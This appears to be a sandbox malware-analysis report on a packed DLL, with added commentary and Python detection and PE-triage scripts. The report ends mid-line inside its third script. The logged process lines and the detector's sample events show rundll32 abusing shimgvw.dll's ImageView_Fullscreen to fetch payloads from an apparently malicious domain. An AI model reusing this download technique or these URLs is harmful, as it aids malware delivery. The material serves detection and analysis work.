Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 131.153.206.231:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEEB3BD 0_2_6BEEB3BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF612B 0_2_6BEF612B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEFB869 0_2_6BEFB869
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEEB07B 0_2_6BEEB07B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEEB71C 0_2_6BEEB71C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF5C80 0_2_6BEF5C80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE6B71C 3_2_6FE6B71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE75C80 3_2_6FE75C80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE6B3BD 3_2_6FE6B3BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE7612B 3_2_6FE7612B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE7B869 3_2_6FE7B869
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE6B07B 3_2_6FE6B07B
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6BEE5570 appears 44 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6FE65570 appears 44 times
Source: LLD5HDX0PS.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine Classification label: mal84.evad.winDLL@20/0@1/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
Source: LLD5HDX0PS.dll Virustotal: Detection: 10%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
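The process tree above is what the rundll32 Sigma hits in the overview are keyed on. The sample's own export is run twice from a DLL on the user's Desktop (`,mydllmain` and ordinal `,#1`), and that rundll32 then spawns further rundll32 instances that load `shimgvw.dll,ImageView_Fullscreen`, the Windows image viewer, with an HTTPS URL where a picture path belongs; that is how a Microsoft-signed system binary ends up making the TLS connections to 131.153.206.231 listed earlier. Below is an added detection example of mine over constructed process-creation events modelled on that tree, with one benign image-viewer launch as a control. It is not the Sigma rules' logic, and the event field names are an assumption rather than any particular log schema.

```python
import re

# Constructed process-creation events modelled on the process tree above, plus a
# benign image-viewer launch (pid 7) as a control. Field names are an assumption,
# not a specific log schema.
EVENTS = [
    {"pid": 1, "ppid": 0, "image": r"C:\Windows\System32\loaddll32.exe",
     "cmdline": r'loaddll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll"'},
    {"pid": 2, "ppid": 1, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1'},
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1'},
    {"pid": 4, "ppid": 1, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\user\Desktop\LLD5HDX0PS.dll,mydllmain"},
    {"pid": 5, "ppid": 4, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt"},
    {"pid": 6, "ppid": 4, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp"},
    {"pid": 7, "ppid": 8, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen C:\Users\user\Pictures\holiday.jpg"},
]

# rundll32 <dll>[,<export|#ordinal>] [args...]; the DLL may be quoted. An unquoted
# DLL path containing spaces is not handled (rundll32 itself is picky about those).
RUNDLL_RE = re.compile(
    r'^\s*(?:"[^"]*rundll32(?:\.exe)?"|\S*rundll32(?:\.exe)?)\s+'
    r'(?P<dll>"[^"]+"|[^\s,]+)'
    r'(?:,(?P<entry>\S+))?'
    r'(?:\s+(?P<args>.*))?$',
    re.IGNORECASE,
)
URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp", ".tif", ".tiff")
# Export that opens whatever path or URL it is handed; a non-image target is the tell.
VIEWER_ENTRY = ("shimgvw.dll", "imageview_fullscreen")


def parse_rundll32(cmdline):
    """Return (dll_path, entry, args) or None if this is not a rundll32 command line."""
    m = RUNDLL_RE.match(cmdline)
    if not m:
        return None
    return (m.group("dll").strip('"'), m.group("entry") or "",
            (m.group("args") or "").strip())


def is_rundll32(image):
    return image.lower().endswith("\\rundll32.exe")


def analyze(events):
    """Return {pid: sorted finding tags} for every rundll32 event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        if not is_rundll32(e["image"]):
            continue
        parsed = parse_rundll32(e["cmdline"])
        if parsed is None:
            continue
        dll, entry, args = parsed
        dll_name = dll.rsplit("\\", 1)[-1].lower()
        tags = set()
        if URL_RE.search(args):
            tags.add("rundll32_url_argument")          # rundll32 handed a URL
        if (dll_name, entry.lower()) == VIEWER_ENTRY and \
                not args.lower().strip('"').endswith(IMAGE_EXTS):
            tags.add("image_viewer_non_image_target")  # viewer used as an opener/downloader
        if any(p in dll.lower() for p in USER_WRITABLE):
            tags.add("dll_from_user_writable_path")    # DLL outside system/program dirs
        parent = by_pid.get(e["ppid"])
        if parent is not None and is_rundll32(parent["image"]):
            tags.add("rundll32_spawned_by_rundll32")   # chaining, as in the tree above
        if tags:
            findings[e["pid"]] = sorted(tags)
    return findings


if __name__ == "__main__":
    for pid, tags in analyze(EVENTS).items():
        print(pid, ", ".join(tags))
```

Each tag on its own is a weak signal (a user opening a picture triggers none of them, a developer running a DLL from Desktop triggers one); the chain at pid 5 and 6 trips three at once, which is the combination to alert on.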
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: LLD5HDX0PS.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEFBF81 push ecx; ret 0_2_6BEFBF94
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEFFD0D push esi; ret 0_2_6BEFFD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE7BF81 push ecx; ret 3_2_6FE7BF94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE7FD0D push esi; ret 3_2_6FE7FD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00C0358B push edx; iretd 4_2_00C0358C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00C02D93 push edx; iretd 4_2_00C02D94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00C0321B push edx; iretd 4_2_00C0321C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00C02E7B push edx; iretd 4_2_00C02E7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04D4E842 push 73A07743h; retf 0000h 5_2_04D4E91A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00E5CF3C push esp; iretd 8_2_00E5CF3D
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
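Three static facts on this page belong together: the file is a 32-bit DLL (`EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL`), it opts into ASLR and DEP (`DYNAMIC_BASE, NX_COMPAT`), and its sections are named `UPX0` and `UPX1`, i.e. it is UPX-packed. The last point matters for reading the rest of the report: anything derived from the file on disk covers only the UPX stub, while the code functions and URL strings above were taken from the loaded modules and the process dumps, after the stub had unpacked the payload. The script below is an added example of pulling those three facts out of the PE headers with nothing but `struct`; it is not part of the report and does not parse the real file. The DLL it builds is a constructed stand-in with the same section names and flags, and the packer prefix list and the mitigation set it checks are my own choices.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics and IMAGE_OPTIONAL_HEADER.DllCharacteristics
# bits (winnt.h); only the ones this example reports on.
FILE_FLAGS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_FLAGS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
             0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF"}
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000
# Section-name prefixes of common packers (my own short list; UPX is the one seen here).
PACKER_PREFIXES = {"UPX": "UPX", ".vmp": "VMProtect", ".themida": "Themida", ".aspack": "ASPack"}
EXPECTED_MITIGATIONS = ("DYNAMIC_BASE", "NX_COMPAT", "GUARD_CF")


def _flags(value, table):
    return [name for bit, name in table.items() if value & bit]


def parse_pe(data):
    """Read machine, characteristics and the section table from a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    machine, nsec, _ts, _sym, _nsym, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                      # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, _rawptr, _rl, _ln, _nr, _nl, sc = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": vaddr,
                         "raw_size": rawsize, "characteristics": sc})
    return {"machine": machine,
            "pe_format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, hex(magic)),
            "file_flags": _flags(chars, FILE_FLAGS), "dll_flags": _flags(dll_chars, DLL_FLAGS),
            "sections": sections}


def triage(info):
    """Packer guess, sections executable yet empty on disk, and missing mitigations."""
    packer = None
    for s in info["sections"]:
        for prefix, name in PACKER_PREFIXES.items():
            if s["name"].upper().startswith(prefix.upper()):
                packer = name
    # A section with no raw bytes but a large virtual size that is both executable and
    # writable is where a packer unpacks to: nothing in it can be analysed statically.
    runtime_filled = [s["name"] for s in info["sections"]
                      if s["raw_size"] == 0 and s["virtual_size"] > 0
                      and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE
                      and s["characteristics"] & IMAGE_SCN_MEM_WRITE]
    missing = [m for m in EXPECTED_MITIGATIONS if m not in info["dll_flags"]]
    return {"packer": packer, "runtime_filled_exec_sections": runtime_filled,
            "missing_mitigations": missing}


def build_sample_dll():
    """Constructed stand-in for LLD5HDX0PS.dll (not the real file): PE32 DLL with
    UPX0/UPX1/.rsrc sections and DYNAMIC_BASE|NX_COMPAT. Sizes and section flags
    follow the usual UPX layout (UPX0 empty on disk, executable and writable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)               # e_lfanew
    sections = [  # name, virtual_size, virtual_addr, raw_size, raw_ptr, characteristics
        (b"UPX0", 0x1F000, 0x01000, 0x0000, 0x0400, 0xE0000080),
        (b"UPX1", 0x0D000, 0x20000, 0xCC00, 0x0400, 0xE0000040),
        (b".rsrc", 0x01000, 0x2D000, 0x0600, 0xD000, 0xC0000040),
    ]
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100)       # DYNAMIC_BASE | NX_COMPAT
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


if __name__ == "__main__":
    info = parse_pe(build_sample_dll())
    print(info["pe_format"], info["file_flags"], info["dll_flags"])
    print([s["name"] for s in info["sections"]], triage(info))
```

Pointing `parse_pe` at a real file is `parse_pe(open(path, "rb").read())`; on a packed sample the useful next step is a dump of the process after the stub has run, which is exactly what the `.sdmp` sources above are.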
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe API coverage: 9.7 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 8.7 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6044 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6136 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 0_2_6BEE1B85
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF38F4 FindFirstFileExW, 0_2_6BEF38F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE61B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 3_2_6FE61B85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE738F4 FindFirstFileExW, 3_2_6FE738F4
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 30000
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: rundll32.exe, 00000007.00000002.3372962854.0000000008128000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3372854058.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008128000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B3D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B07000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F7E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6BEE53EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF4AF5 GetProcessHeap, 0_2_6BEF4AF5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6BEE53EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE4EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6BEE4EDC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEEDCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6BEEDCFD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE64EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6FE64EDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE6DCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6FE6DCFD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6FE653EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6FE653EE

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 131.153.206.231 443
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE55EB cpuid 0_2_6BEE55EB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE503D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6BEE503D
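Several of the anti-analysis findings above should be weighed before they count against the sample. `IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter` is the fail-fast path (`__scrt_fastfail`) that the Microsoft Visual C++ runtime links into every binary built with it, and the three-call variant without `IsProcessorFeaturePresent` is the same runtime's report-fault path; `SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess` is its stack-cookie failure handler (`__raise_securityfailure`), and `GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter` is the cookie initialiser (`__security_init_cookie`). The runtime also issues `cpuid` at start-up to select instruction-set specific routines, and a lone `GetProcessHeap` is how every heap allocation begins. None of that is deliberate evasion in the way the 30-second sleeps and the UPX packing are. The script below is an added example of mine, not part of the report, that separates the two: it parses the `Code function:` lines, matches each call chain against a table of runtime sequences (my own list, limited to the chains on this page), and leaves the rest for manual review ranked by whether they touch an API worth reading first. The sample lines are a constructed subset of the ones above.

```python
import re

# Constructed subset of the "Code function:" lines above (the loaddll32 and rundll32
# copies of a routine share one chain, so one of each routine is enough).
SAMPLE_LINES = r"""
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6BEE53EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEF4AF5 GetProcessHeap, 0_2_6BEF4AF5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE4EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6BEE4EDC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEEDCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6BEEDCFD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE503D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6BEE503D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6BEE1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW, 0_2_6BEE1B85
"""

# Call chains the MSVC runtime links into every binary built with it (my own table,
# limited to the sequences on this page). Matching one of these is not evasion.
CRT_SEQUENCES = {
    ("IsProcessorFeaturePresent", "IsDebuggerPresent",
     "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"): "CRT __scrt_fastfail",
    ("IsDebuggerPresent", "SetUnhandledExceptionFilter",
     "UnhandledExceptionFilter"): "CRT report-fault path",
    ("SetUnhandledExceptionFilter", "UnhandledExceptionFilter",
     "GetCurrentProcess", "TerminateProcess"): "CRT __raise_securityfailure",
    ("GetSystemTimeAsFileTime", "GetCurrentThreadId",
     "GetCurrentProcessId", "QueryPerformanceCounter"): "CRT __security_init_cookie",
}
# APIs that make a non-CRT chain worth reading first (my own short list).
HIGH_VALUE_APIS = {"CopyFileW", "TerminateProcess", "CreateProcessW", "WriteProcessMemory",
                   "VirtualAllocEx", "CreateRemoteThread", "ShellExecuteW", "InternetOpenUrlW"}

# "<addr> Api1,Api2,...,ApiN, <addr>"; lines without an API chain do not match.
FUNC_RE = re.compile(r"Code function: (?P<addr>\S+) (?P<chain>(?:[A-Za-z_]\w*,)+) \S+$",
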